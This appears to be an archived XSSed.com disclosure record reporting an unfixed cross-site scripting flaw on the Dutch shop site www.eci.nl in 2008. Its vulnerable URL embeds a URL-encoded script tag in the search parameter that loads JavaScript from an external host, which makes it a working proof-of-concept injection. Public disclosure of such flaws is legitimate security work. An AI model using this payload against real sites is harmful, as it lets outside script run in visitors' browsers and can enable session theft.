Unfixed XSS vulnerability at www.eci.nl

2008-10-25T00:00:00
ID XSSED:52849
Type xssed
Reporter DeepImpact
Modified 2008-10-25T00:00:00

Description

Security researcher DeepImpact, has submitted on 25/10/2008 a cross-site-scripting (XSS) vulnerability affecting www.eci.nl, which at the time of submission ranked 56306 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 25/10/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.eci.nl/is-bin/INTERSHOP.enfinity/WFS/shop-eci_nl-Site/nl_NL/-/EUR/FHSearch-Start;pgid=wVEClc8hImI000ILeznLwewk0000YC564ghL?fh_search=c%2047%3cscript%20src%20%3d%20%27http%3a%2f%2fvuln%2exssed%2enet%2fthirdparty%2fscripts%2fckers%2eorg%2ejs%27%20%3e%20%3c%2fscript%3e&fh_location=%2f%2froot%2fnl_NL%2fassortment%3e%7bnlecXtra%7d&enfaction=msearch&action=search&fh_search_type=mus&search=Search&searchcategory=N%2fA&ExtraCategory=true